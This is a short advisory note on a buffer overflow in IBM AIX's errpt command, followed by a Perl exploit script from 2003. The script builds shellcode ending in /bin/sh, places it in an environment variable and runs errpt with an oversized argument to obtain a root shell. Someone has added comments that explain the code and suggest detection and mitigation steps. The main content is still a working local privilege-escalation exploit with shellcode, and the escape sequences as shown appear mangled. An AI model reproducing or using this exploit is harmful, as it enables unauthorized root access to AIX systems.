source: http://www.securityfocus.com/bid/5885/info
The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.
#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested : on Aix5.1
# Author : [email protected]
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-4-16
# Announce: use at your own risk!
# Build the string that is later placed in the CC environment variable:
# a single "A" followed by 500 repetitions of one 12-character group
# (the x operator binds tighter than the . concatenation).
# NOTE(review): as rendered on this page the x.. groups are plain characters,
# so treat the listing as illustrative and not as exact bytes for signatures.
$BUFF="A". "x7cxa5x2ax79"x500;
#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
# The author's payload is appended to $BUFF in eight pieces; the last piece
# ends in the path /bin/sh, consistent with the header's stated goal of a
# root shell.
$BUFF.="x7ex94xa2x79x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb6x05xffxffx7ex94xa2x79";
$BUFF.="x7ex84xa3x78x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb7x05xffxffx38x75xffx04";
$BUFF.="x38x95xffx0cx7ex85xa3x78x90x75xffx0cx92x95xffx10";
$BUFF.="x88x55xfexe1x9ax95xffx0bx4bxffxffxd8/bin/sh";
# Empty the whole environment, then set CC as its only variable.
# Detection note: an errpt process started with an otherwise empty
# environment and one very large variable is an unusual pattern worth
# alerting on.
%ENV=(); $ENV{CC}=$BUFF;
# Replace this process with /usr/bin/errpt using list-form exec, so no shell
# parses the arguments. The -T value is "A" followed by a 12-character group
# repeated 1320 times; this oversized -T argument is presumably what reaches
# the overflowing buffer -- confirm against the vendor advisory.
# Mitigation notes: apply any vendor fix for this issue, review whether local
# users need to run errpt with elevated privileges (the page states the code
# runs as root, which suggests a privileged binary -- verify), and audit
# executions of errpt with abnormally long arguments.
exec "/usr/bin/errpt","-T","A"."x2fxf2x2ax40"x1320;
#EOF